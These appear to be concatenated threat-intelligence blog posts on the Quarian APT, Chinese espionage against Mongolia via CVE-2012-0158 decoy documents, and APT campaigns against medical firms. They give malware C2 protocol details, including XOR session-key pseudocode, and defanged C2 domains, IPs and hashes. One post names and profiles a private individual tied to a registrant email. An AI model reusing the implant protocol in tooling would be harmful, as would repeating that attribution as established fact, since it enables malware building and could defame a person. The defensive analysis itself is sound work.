The document used to target the Syrian MoFA leveraged an exploit for CVE-2010-0188 and was delivered on December 5th, 2011, nearly a year and a half after a fix was available.  The document that purportedly targeted the State Department was sent June 5th, 2012 and leveraged CVE-2010-3333.  This time the Quarian actors were only about seven months behind the patch, which may be considered a slight improvement in their initial targeting window.  ThreatConnect Research observed another CVE-2010-3333 attempt with MD5: 60fd5f5140ccfa4d838948c7ab0f4201 in April 2013.  However, in the most recent Quarian targeting, all documents leveraged CVE-2012-0158.  Considering the patch for CVE-2012-0158 was released in April 2012 with MS12-027, the Quarian actors are comfortable leveraging an exploit that was patched over a year ago.  As a disclaimer, we constantly observe multiple threat groups using CVE-2012-0158 exploits as it is currently a favored and reliable publicly known Office exploit.  What we can infer is that this APT group has the basic ability to leverage or acquire exploits for well-known and patched vulnerabilities.  Also, that they will continue targeting users with the minimal amount of effort that results in successful exploitation.  If the Quarian actors possess more agile timelines for leveraging newer or unknown (zero-day) exploits, they have not demonstrated it with the observed campaigns. ThreatConnect Research assesses the Quarian group’s demonstrated sophistication in leveraging new exploits as low based their observed patterns of activity.

Quarian Network Protocol Analysis:

The SourceFire VRT blog detailed an in-depth analysis of Quarian’s C2 protocol.  In the samples we analyzed, we noticed similar but slightly different behavior. As is detailed in both Securelist’s and VRT’s blogs, the malware checks for proxy settings and if present, sends a misspelled HTTP CONNECT request to the local proxy.  If there is no proxy configured, you will see a direct connection to the C2 server over TCP 443.   One difference noted was how the session XOR encryption key was established. In the VRT samples, each side used its own 8 Byte XOR key to obfuscate the commands and responses passed between them. With the samples obtained by ThreatConnect Research, the implant sent an 8 byte nonce, the C2 responded with a different 8 byte nonce, the implant XOR’ed the C2 key by its own key to establish a session key.  Both sides used the new session key to XOR the commands and responses passed between them.

The algorithm that the implant used to compute the session key is below:

for (i = 0 ; i < 8 ; i++) {

c = C2_nonce[i] ^ implant_nonce[i]

if (c == 0) c = ~i

session_key[i] = c


The implant_nonce is the initial 8 bytes sent by the implant and C2_nonce is the 8 bytes received from the C2. The algorithm prevented any 0 bytes from appearing in the session key, which would have otherwise allowed some cleartext data to pass unencoded over the network.  Data was encoded/decoded by XOR’ing each byte against the session key on a rotating basis, as expected.  However, it did not restart at the first byte of the key with every encoding.  The indexes of the last key byte used for encoding and for decoding were stored and then retrieved when it was time to encode/decode another packet.  The indexes were initialized to 0, and then never zeroed again during the life of the session, i.e. until a new session handshake was performed.

pcapFigure 7. PCAP of Quarian communication with controller

The variety of slightly different C2 protocols in the wild could show that the Quarian APT group was attempting to diversify its capabilities to help avoid detection.  However, the same easy to find proxy and mutex strings were still present in the newer malware, which would again suggest little concern was placed on public awareness of their malware and its network characteristics.


China, along with Russia, has actively blocked U.N. Resolutions against Syria throughout the crisis from their seat on the U.N. Security Council.  While China’s interests are not as obvious as Russia’s with Syria, China and Syria maintain strong economic and military ties in existence prior to the crisis.  In terms of Quarian actors operational security, either their threshold for public attention is high or their ability to quickly adapt is low, demonstrated by their resistance to significant changes, despite multiple public reports detailing their malware and infrastructure.  Many of the characteristics of Quarian align with the textbook standard for other “China-nexus” APT groups (e.g. spearphishing emails for targeted exploit delivery, use of dynamic DNS services for C2 infrastructure, use of “good-enough” exploits to gain system and network access).  Keeping track of persistent network threats as they evolve, as we have done with the Quarian campaigns, is a repeatable process within ThreatConnect.

The following graphic (Figure 8) highlights the value of collaboration, threat intelligence sharing and fused perspective obtained from community reporting over time.  This extended visibility into a persistent threat group gives a shared awareness to network defense and enterprise security teams that need to protect themselves from this or any other persistent threat.


Figure 8.  Graphic representation of Quarian activity overlaid with ThreatConnect Research and AV industry reporting. (Click image for better resolution)

Our ongoing and dynamic analyses of the various Quarian implants have all been shared within the exclusive ThreatConnect Subscriber Community as they were discovered, packaged nicely with exportable indicators and signatures. For more information about moderated subscriber communities please click here or contact us with any questions.

With the publication of this blog, the Threat “QUARIAN APT”  and the following ThreatConnect Incidents have now been shared system wide to all public and private ThreatConnect Communities along with Snort and Yara signatures that detect the observed version of the Quarian implant.

If your organization is interested in obtaining regular crowd-sourced threat intelligence that increases your awareness of existing or emerging threats like Quarian, please register at ThreatConnect, join our communities or create your own, connect and collaborate together.

Khaan Quest: Chinese Cyber Espionage Targeting Mongolia

Executive Summary:

The ThreatConnect Research Team has identified a weaponized Microsoft Word document that contains a Concept Development Conference (CDC) announcement for the joint US and Mongolia military exercise called Khaan Quest 2014.  Retrospective ThreatConnect Research Team research identified additional decoy documents, written in Mongolian, themed around events like the Mongolian presidential election, held in June 2013. KQ2013This activity represents Chinese Computer Network Exploitation (CNE) activity against Mongolian entities and others that have economic, military, or diplomatic relations with Mongolia.  Mongolia’s attempt to steer a more independent path by reaching out to what it calls “third neighbors,” such as the United States, Japan, South Korea, and the European Union, is possibly prompting China to conduct CNE. This would help China maintain awareness of changes in Mongolian relations with the US and other Western influences and protect their national interests in Mongolia.

Details associated with this threat have been shared within all ThreatConnect Communities as Incident “20130910A: KQ14 – CDC Document Exploit”.

Analysis of Khaan Quest 2014 CDC Message:

ThreatConnect Research has identified a weaponized Microsoft Word document that appears to be an official unclassified announcement from the US Army Pacific, notifying Army, Marine Corps and State Department entities of a pre-planning CDC for a US military exercise, Khaan Quest 2014. This document “DRAFT MSG – KQ14 – CDC ANNOUNCE MESSAGE.doc” (MD5: F541CADA66C9E801976C30DEEF4AD42D) exploits CVE-2012-0158 and drops an implant (MD5: 6AB333C2BF6809B7BDC37C1484C771C5) that calls out to the malicious command and control (C2) domains peaceful.linkpc[.]net, mongolia.regionfocus[.]com, and mseupdate.strangled[.]net.


Additional Mongolian Defense Exercise Targeting:

Additional ThreatConnect Research analysis identified a document “VN Tsergiin acedemy update.doc” (MD5: 65587968eead577c54d55db170ca2fd2) exploiting CVE-2012-0158 that dropped the same malicious implant (MD5; 6AB333C2BF6809B7BDC37C1484C771C5) and calls out to the same domains as the Khaan Quest document.  This document is written in  Mongolian and appears to be an official Ministry of Defense announcement of plans for military training with the Vietnamese military.  This may indicate that a broader targeting campaign is occurring against Mongolian Ministry of Defense entities responsible for plans and exercises.



When executed, both of the documents are engineered to exploit CVE-212-0158 and drop the same malicious implant, “DW20.exe” (MD5: 6AB333C2BF6809B7BDC37C1484C771C5) and interact with the same C2 infrastructure.Comment_Graphic


Once successfully installed on the victim host, the implant issues a GET request to the following hardcoded path and file /2011/n325423.shtml:



The implant also contains the following hardcoded C2 strings:



ThreatConnect Infrastructure Enrichments:

Follow-on research identified additional C2 domains. ThreatConnect Research observed numerous common infrastructure overlaps peaceful.linkpc[.]net, mongolia.regionfocus[.]com, and mseupdate.strangled[.]net.  As of early October 2013, all of the C2 domains identified in these examples have overlapped, resolving to a common IP Address 113.10.205[.]236 (Hong Kong).


Retrospective analysis of domain resolutions from October 7th 2011 to October 7th 2012 reveal that the threat actors have consistently used common infrastructure, such as IP addresses 58.64.200[.]105 and 58.64.200[.]106 (Hong Kong).



A Nexus to China:

ThreatConnect Research analyzed the registration point of contact information for the domains that were hardcoded in implant MD5: 6AB333C2BF6809B7BDC37C1484C771C5 and previously resolved to IP addresses 58.64.200[.]105 and 58.64.200[.]106.  Analysis was performed to discover any connections between the contact information provided to register the malicious domains and any personal information posted on the Internet by an adversary that may have been responsible for this activity.  The following email addresses have been used to register the domains of interest.

Analyst Comment: ThreatConnect Research recognizes that there are other domains and subdomains associated with these malicious registrants, however the focus is in the context of the referenced activity.


Research on the email address that was identified within the registration of the regionfocus[.]com domain “yyan_79@hotmail[.]com” reveals a 2008 academic research paper entitled “Research on P2P File Sharing Anti-pollution Strategy”. yyan_paper The identified research paper was authored by a Chinese female named “Yun Yan” who was born in 1979 and was a doctorate research student in the Department of Electronic and Information Engineering at the Dalian University of Technology in China.


A Nexus to “Comment Crew” aka “APT1”:

As of  October 5 2013, ThreatConnect Research identified an additional malware sample (MD5: FD708F4594F24430204C19536801BCD9) that issues the same GET request, “/2011/n325423.shtml”, and calls out to mongolia.regionfocus[.]com.  This file was compiled on October 5 2013, at 07:18GMT and submitted to VirusTotal at 07:23GMT (five minutes later), indicating that the adversary may have been testing the malware for antivirus detection. ThreatConnect Research analysis of the binaries and tradecraft employed in the activity described above suggests that “Comment Crew”, aka “APT1”, is likely using this custom implant as well.  The “/2011/n325423.shtml” in the GET request has been previously identified within several APT1 data sets. Retrospective analysis of a known APT1 malware sample MD5: 5100f0a34695c4c9dc7e915177041cad (as seen in appendix Erevealed the same GET request for “/2011/n325423.shtml” and legacy C2 nodes that resolved to hardcoded IP address 68.96.31[.]136 (Omaha, Nebraska).


This research identified multiple legacy APT1 domains resolving to 68.96.31[.]136 at various points from September 18th, 2010 until mid February 2013 when the APT1 report was publicly released and the malicious infrastructure was subsequently sinkholed.


The “Safe” Campaign Continues:

ThreatConnect Research analyzed another separate binary (MD5: 32263b37d8a06595860db2ebdd4ba649) that also exploited a CVE-2012-0158, but dropped a different malware implant that communicated with separate C2 infrastructure.  In this case, the decoy document was also written in Mongolian but appears to be unrelated to the two previous examples as described above.  When translated, the document references the June 2013 Mongolian presidential election.

Analyst Comment: ThreatConnect Research is not suggesting that the “Comment Crew” activity described above and the “Safe” campaigns are in anyway linked or associated.



When executed, the document drops the following files in the C:DOCUME~1ADMINI~1LOCALS~1TempSafeNet directory:



SafeCredential.DAT also has the following hardcoded C2 strings including the C2 domain mongolbaatarsonin[.]in, and RC4 encryption key, and a campaign tag of “0411”:

0411The malware implant dw20.EXE(MD5: 7E1033C4304DC57DBAAD38D5AEF3D6B3) was designed to communicate over HTTP, when executed and included a unique User-Agent string, “Fantasia”: record The activity identified within this instance is similar to activity that TrendMicro has dubbed “Safe” and recognizes this malware as TROJ_DROPER.SMA. In their March 2013 paper, TrendMicro describes a very similar attack using the same implant type but two different sets of C2 servers, one of which included the domains, mongolbaatar[.]us and mongolbaatarsonin[.]in. According to TrendMicro, this infrastructure was used to target Mongolian and Tibetan victims. This example demonstrates a continued interest on the part of the “Safe” threat actors in targeting individuals and organizations affiliated with Mongolian issues.

Likely Attacker Motives:

US Military Support for Mongolia

Khaan Quest is an annual exercise hosted by the Mongolian Armed Forces with co-sponsorship alternating between the US Marine Corps Forces, Pacific and US Army Pacific. Approximately 1,000 troops from Mongolia, United States, Australia, Canada, France, Germany, Japan, India, Nepal, Republic of Korea, Tajikistan, United Kingdom and Vietnam took part in the exercise between 3 and 14 August 2013.  This is a prime example of the Mongolian military benefiting from US military cooperation and support.  The US has afforded Mongolian officers, citizens, and Foreign Service personnel the opportunity to attend military academic and training institutions across the US; engage in multiple training programs alongside US military personnel; and be given large amounts of technical support and upgrades.  In the past, Mongolia’s military has been developed and maintained largely by either Soviet Russia or China. Mongolia does not wish to repeat this scenario for fear of over-reliance on its powerful neighbors, and their possible political and military coercion, so it looks to the US for support in developing Mongolia’s military. As Mongolia does not share a border with the US, and has no history of US interference, it can comfortably develop a bilateral alliance with the US. The Chinese government regards the US as “a potential foe” which is threatening to deploy an encirclement strategy connecting from Central Asia to Mongolia.  Exercises such as Khaan Quest embody China’s perceived US encroachment in the region.  Beijing cannot afford to overlook the importance of developing relations with Mongolia to counter what they perceive as a US encirclement strategy.

Mongolian Foreign Relations

Mongolia became the 57th nation to join the Organization for Security and Co-operation in Europe (OSCE) on 21 November 2012. The OSCE Office for Democratic Institutions and Human Rights (ODIHR) also monitored the 26 June presidential election in Mongolia. ODIHR was invited by the government of Mongolia to observe the presidential election, in line with the country’s commitments as an OSCE participating State. In spite of the vast borders it shares with Russia and China, Mongolia is attempting to steer a more independent path by reaching out to what it calls “third neighbors,” such as the United States, Japan, South Korea, and the European Union, in order to preserve its independence. Mongolia hopes that engagements such as joining OSCE will alter the dynamics of the region, so that it will move from being bound by Russia-China geopolitics to becoming a fully independent member of the region and international society. A strategic pivot westward by Mongolia only diminishes Chinese influence.

Investment in Mongolia by China

Lying beneath Mongolia’s storied lands is an estimated $1.3 trillion in mineral resources such as coal, iron ore and copper. In 2011, China was a consumer of nearly 8 million metric tons of copper, accounting for 40% of the world’s total. By 2014, it is expected that China will consume nearly 84% of the world’s copper. A burgeoning natural resource and mining sector is expected to make Mongolia’s the second fastest growing economy worldwide in 2013, building upon over a decade of rapid economic expansion. The Oyu Tolgoi mine, a combined open pit and underground mining project in Mongolia, is the largest financial undertaking in Mongolia’s history and is expected to reach 500,000 tons of copper output annually. The Oyu Tolgoi mine is being developed as a joint venture between companies Turquoise Hill Resources, Rio Tinto and the Government of Mongolia. China imported 7% of its copper from Mongolia in 2012, when Oyu Tolgoi was just starting up. By having a mine like that on their doorstep, it would decrease China’s reliance on copper from Latin America, particularly Chile, where China gets over 74% of its copper. Beginning in the 1990s, China has become Mongolia’s biggest trading partner, and numerous Chinese businesses are operating there. China has been the largest investor in Mongolia since 1998 and its largest trading partner since 1999. In 2009, the bilateral trade figure stood at $2.4 billion with China importing $1.3 billion worth of commodities, which accounted for more than 70 per cent of Mongolian exports. According to official Mongolian statistics, China invested a total of $2.3 billion dollars in 2009, more than 60 percent of the total foreign investment in Mongolia.


This activity represents Chinese Computer Network Exploitation (CNE) activity against organizations that China perceives to be jeopardizing its interests in Mongolia. As evidenced in the weaponized Khaan Quest document described above, Chinese APT groups will likely continue targeting US military entities involved in cooperation activities with the Mongolian military. Also, western European and other governments that engage with Mongolia diplomatically will be considered CNE targets as well. China’s heavy economic investment in Mongolian natural resources will likely continue to fuel cyber espionage efforts against commercial entities, particularly mining and energy exploration companies that may compete with Chinese mining and energy companies in Mongolia. Details associated with this threat have been shared system wide within all ThreatConnect Communities as Incident “20130910A: KQ14 – CDC Document Exploit”. If your organization is interested in obtaining regular crowd-sourced threat intelligence that increases your awareness of existing or emerging threats please register at ThreatConnect, join our communities, connect and collaborate together.

Network Health: Advanced Cyber Threats to the Medical & Life Sciences Industries

In a 2011 report to Congress on Foreign Economic Collection and Industrial Espionage released by the Office of the National Counterintelligence Executive, the authors stated that “Healthcare services and medical devices/equipment will be two of the five fastest growing international investment sectors according to a US consulting firm. The massive research and development (R&D) costs for new products in these sectors, up to $1 billion for a single drug, the possibility of earning monopoly profits from a popular new pharmaceutical, and the growing need for medical care by aging populations in China, Russia, and elsewhere are likely to drive interest in collecting valuable US healthcare, pharmaceutical, and related information.”

Cyber Squared is actively tracking sophisticated cyber threats, some of which are targeting the medical and life sciences industries, in  In  recent years, cyber threat groups have increasingly demonstrated a growing interest in these industries.  Due to this identified trend, Cyber Squared has developed a case study that examines targeted attacks and describes the motives behind the victimization of the medical industry by these specific threat groups.

Because attacks within the medical industry rarely make headlines, one may not be aware of its appeal to attackers but there are several reasons why it is a prime target. Those within the medical industry who research, develop, sell products, or provide services to consumers need to understand why they are being targeted, that they are faced with an increasing risk, and how they can better protect their assets. The following examples identify specific APT threat groups that are targeting medical and health related organizations today.

APT Example 1:

In October of 2012, a Chinese threat actor staged the domains geneoptix[.]com, bioduroinc[.]com, and accsenture[.]com to host a malicious Internet Explorer (IE) zero day exploit (CVE-2012-4969).  Links to these malicious websites were most likely used within targeted spearphishing campaigns and/or within targeted driveby download attacks.  The staged domain names resembled the domains of the legitimate companies GenOptix, BioDuro and Accenture, all of whom provide advanced medical, drug, and life sciences research. The identified malicious infrastructure co-existed at overlapping points in time, which indicates that there were likely multiple concurrent targeting campaigns occurring.

Cyber Squared was able to confirm that the attackers mirrored the legitimate BioDuro website with a driveby attack site that used a malicious iframe redirecting users to a CVE-2012-4969 IE zero day exploit.  BioDuro is a Drug Discovery and Life Science Research company located in Beijing.  Upon compromise the victims were subsequently infected with a downloader variant of Destroy Remote Access Trojan (RAT) known as Win32/Thoper.B aka Sogu aka TVT.

The attackers would have had the ability to leverage the malicious infrastructure to directly target a variety of individuals such as personnel within the legitimate companies, their parent companies, partners, affiliates and competitors. Any individual within a target organization who would have recognized and trusted the BioDuro brand would have been an ideal target.  Persistent access to cutting edge research or competitive information could have allowed the attackers to leverage their remote accesses to provide an advantage to the benefactors of any compromised data.

APT Example 2:

On July 2, 2012, AlienVault Labs published a blog about a family of malware called Sykipot, which was a follow-up from a January 12th blog.  The Sykipot implant (also known as GetKys) has been used in targeted attacks for at least the past couple of years, and unconfirmed traces date back to as early as 2006. While the AlienVault Labs blog identified nine domains that were registered by Sykipot actors, Cyber Squared analysts used ThreatConnect to apply additional enrichments to the Alien Vault data, and were able to grow the data set to more than thirty additional command and control (C2) domains and three email addresses used to register the C2 domains. After analyzing the infrastructure used by the perpetrators of Sykipot, Cyber Squared has confidently determined that these adversaries are targeting the medical industry. Here is a sample of the results of our analysis:

  • One of the thirty domains registered by the Sykipot actor(s) is “nihnrhealth[.]com”, which could be easily mistaken by a Sykipot victim as a legitimate domain associated with the National Health Information Network.
  • Another Sykipot command and control domain (server.hostdefense[.]net) resolved to the IP address of a host registered by the Asian Pacific AIDS Intervention Team (APAIT). The APAIT is an organization that positively affects the quality of life for Asian and Pacific Islanders living with or at-risk for HIV/AIDS by providing a continuum of prevention, health and social services, community leadership and advocacy to the Southern California region. APAIT is one of the nation’s largest providers of HIV/AIDS prevention and care services for the Asian and Pacific Islander (API) communities. Based in Southern California, APAIT has been providing culturally and linguistically appropriate services to API’s since 1987. (Commerce, 2009) It is likely that APAIT networks were a previous target of threat actors, and are being repurposed in subsequent attacks. (Parkour, 2010)
  • Cyber Squared used ThreatConnect to analyze Sykipot domain “e-landusa[.]net”, and identified more than twenty other command and control domains had resolved to IP address 24.236.34[.]140.  One of the domains identified was “altchksrv.hostdefence[.]net”. AlienVault previously implicated Sykipot actors using “altchksrv.hostdefence[.]net” in attacks that utilized Adobe vulnerability CVE-2011-2462 in December 2011.
  • “Hostdefence[.]net” was registered by the email address “parviz7415 [at]”, and has another sub domain of “server.hostdefence[.]net”. Both “server.hostdefence[.]net” and “altchksrv.hostdefence[.]net” resolved to 216.2.95[.]195, (the APAIT IP address) for nearly 12 months.
  • A malware sample submitted to ThreatExpert in January 2012 was labeled Sykipot by Kaspersky antivirus signatures, and attempts connections to 216.2.95[.]195.  Victims were exploited to deliver malicious software that enabled a command and control relationship between their compromised systems and the Sykipot actor’s infrastructure.  Domains were tailored to the medical community and medical systems that used unwilling participants in exploitation efforts as midpoint hops.
  • While not connected to Sykipot, between December 8, 2011 and January 18, 2012, four other malware samples were submitted to ThreatExpert that had APAIT IP address 216.2.95[.]195 embedded as a command and control destination. All were assessed to be of Chinese origin.
  • Further research shows a 2010 targeted email attack using an APAIT Internet Protocol address to send a malicious spearphishing message.

APT Example 3:

Between June and July of 2012, a group of Chinese threat actors (also known as “VOHO”) employed a driveby download campaign to mass compromise their victims.  The targets appeared to be specifically chosen to compromise victims involved in business and local governments in Washington, D.C. and Boston, Massachusetts, as well as organizations involved the development and promotion of the democratic process in non-permissive regions.  The attackers used the Gh0st RAT to interact with their victims.  According to a report by RSA, the attackers compromised a legitimate Taiwanese medical web site, “www.wsdhealty[.]com” to host malicious software that exploited Java and Microsoft vulnerabilities CVE-2012-1889 and CVE-2012-1723.  Cyber Squared was able to identify that the attackers also staged the domain, “nih-gov.darktech[.]org” within associated malicious command and control infrastructure also used within the initial VOHO campaign.  This likely indicates an infrastructure management technique on the part of the VOHO actors in targeting the National Institute of Health (NIH) as part of the VOHO campaign.


The threats posed by resourced and sophisticated threat groups targeting the medical and life sciences industry is very real.  The application of economic espionage within these industries ultimately leaves multi-billion dollar lifesaving research and medical breakthroughs in the crosshairs.  Organizations, who invest their time and resources specializing in advanced life sciences and research, must begin to address the risks posed by sophisticated threats in an effort to minimize intellectual property loss and disruptions to business operations. Those who are unwilling to address the risk posed by persistent cyber threats could face the loss of intellectual property, market share, revenues and much more.

All of the APT examples highlighted above have all been compiled and publicly shared under Incident “20130313A: Medical Threats Blog” within the ThreatConnect community.  If you represent a medical research or life sciences organization and wish to obtain regular threat intelligence updates within a secure community sharing exchange, please register at for an organizational account. The Medical Case Study, “Medical Industry, A Cyber Victim: Billions Stolen and Lives At Risk”, is available on the Cyber Squared downloads page.